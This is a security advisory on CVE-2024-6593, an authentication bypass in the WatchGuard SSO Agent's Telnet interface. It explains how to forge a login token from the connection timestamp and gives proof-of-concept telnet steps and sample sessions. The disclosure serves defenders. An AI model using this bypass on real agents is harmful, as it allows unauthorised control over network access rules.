Advisory: WatchGuard SSO Agent Telnet Authentication Bypass Advisory: WatchGuard SSO Agent Telnet Authentication Bypass The WatchGuard SSO Agent exposes a Telnet interface on TCP port 4114 which is vulnerable to an authentication bypass granting unauthenticated attackers access to management commands. ### Details - Product: WatchGuard Active Directory Single Sign-On (SSO) - Affected Versions: Authentication Gateway <= 12.10.2 - Fixed Versions: None - Vulnerability Type: Authentication Bypass - Security Risk: high - Vendor URL: https://www.watchguard.com/ - Vendor Status: notified - Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2024-007 - Advisory Status: published - CVE: CVE-2024-6593 - CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6593 ### Introduction > When users log on to the computers in your network, they must give a > user name and password. If you use Active Directory authentication on > your Firebox to restrict outgoing network traffic to specified users or > groups, your users must also complete an additional step. They must > manually log in again to authenticate to the Firebox and get access to > network resources or the Internet. To simplify the log in process for > your users, you can use the WatchGuard Single Sign-On (SSO) solution. > With SSO, your users on local networks provide their user credentials > one time (when they log on to their computers) and are automatically > authenticated to your Firebox. (from [vendor's homepage](https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/authentication/sso_c.html)) ### More Details The WatchGuard SSO Agent exposes a Telnet interface on TCP port 4114. Without authentication, only the help message can be displayed: ``` $ telnet 4114 Trying ... Connected to . Escape character is '^]'. EVENT 350 log info Connected to the WatchGuard Authentication Gateway SSO agent. Version 12.10.2.29857 Build 691995. Connected at:06/06/2024 11:16:44 To log in to the SSO Agent, type your user credentials. Or, type "help" to see the list of available log in commands. After you log in, type "help" to see all of the commands available for the SSO Agent. help ? Show help help Show help login Log in user. Use quotes if there are spaces in the credentials. quit Terminate the connection. ``` It was discovered, that the authentication can be bypassed by issuing a command followed by a Base64-encoded token, which can be calculated by XORing the timestamp from the initial message (in this case `06/06/2024 11:16:44`) with the repeated byte `0x89`. Generating this token was implemented in : ``` $ ./wgclient.py authbypass 'EVENT 350 log info Connected to the WatchGuard Authentication Gateway SSO agent. Version 12.10.2.29857 Build 691995. Connected at:06/06/2024 11:16:44' ub+mub+mu7m7vam4uLO4v7O9vQ== ``` The token can then be used to bypass authentication in the Telnet session: ``` async-test list UI ub+mub+mu7m7vam4uLO4v7O9vQ== [...] help ? Show help help Show help login Log in user. Use quotes if there are spaces in the credentials. logout Log out. get user Show all users logged in to . Ex:get user 192.168.203.107 get timeout Show the current timeout value. get status Show the status for connections. get status detail Show connected SSO clients, pending, and processing IP addresses. get clear cache status Show SSO Agent and ELM clear cache status. get domain Show the current domain filter. get version Show the SSO component name, version, and build information for the IP address. get version all Show the SSO component name, version, and build information for all the monitored IP addresses. log off Remove the IP session on FireBox and reset SSO Exchange Monitor Session Check Internal. set domainfilter on Enable domain filter. set domainfilter off Disable domain filter. set user Set artificial user information (for debugging) set debug on Save debug messages to a file in the same location as the .exe. set debug verbose Enable additional log messages. flush Clear cache of address. flush all Clear the cache of all IP addresses. list Return a list of all the IP addresses in the cache with expiration dates. list config Return a list of all the monitored domain configurations. list user Return a list of all registered users. list eventlogmonitors Return a list of all Event Log Monitors. list exchangemonitors Return a list of all Exchange Monitors. quit Terminate the connection. ``` Attackers can then issue management commands. For example, it is likely possible to set artificial user information in order to apply or lift network restrictions for arbitrary hosts. ### Proof of Concept Connect to the Telnet interface of the WatchGuard SSO Agent: ``` $ telnet 4114 ``` Copy the initial message and use it to generate an authentication bypass token using : ``` $ ./wgclient.py authbypass '' ``` Issue the following command with the generated token in the telnet session to bypass authentication: ``` async-test list UI ``` ### Workaround As a workaround, network access to the Telnet interface port should be restricted to trusted hosts that actually require access to this specific interface. ### Security Risk Attackers can issue management commands via the Telnet interface of the WatchGuard SSO Agent without prior authentication. This level of access may be used to apply or lift network restrictions to arbitrary hosts. Therefore, this vulnerability poses a high risk. ### Timeline - 2024-06-05 Vulnerability identified - 2024-06-10 Customer approved disclosure to vendor - 2024-06-20 Vendor notified - 2024-06-27 Vendor confirmed they received the reports - 2024-07-04 Asked vendor to confirm the vulnerabilities and provide a timeline to resolve the issues - 2024-07-09 Vendor confirmed vulnerabilities, said a timeline will be provided at a later date - 2024-08-08 Asked for update regarding timeline, reminded vendor about 90-day responsible disclosure time frame - 2024-09-03 Asked for update - 2024-09-10 Asked for update again with hint to our planned release after 90 days - 2024-09-13 Vendor provided update that a potential resolution was identified - 2024-09-16 Vendor announced they will publish advisories on the following day, a fix is planned for end of October - 2024-09-17 After customer conferred with WatchGuard, publication was deferred for one week in order to implement mitigations - 2024-09-18 Confirmed new release date with WatchGuard - 2024-09-25 Advisory published ### RedTeam Pentesting GmbH RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: ### Working at RedTeam Pentesting RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: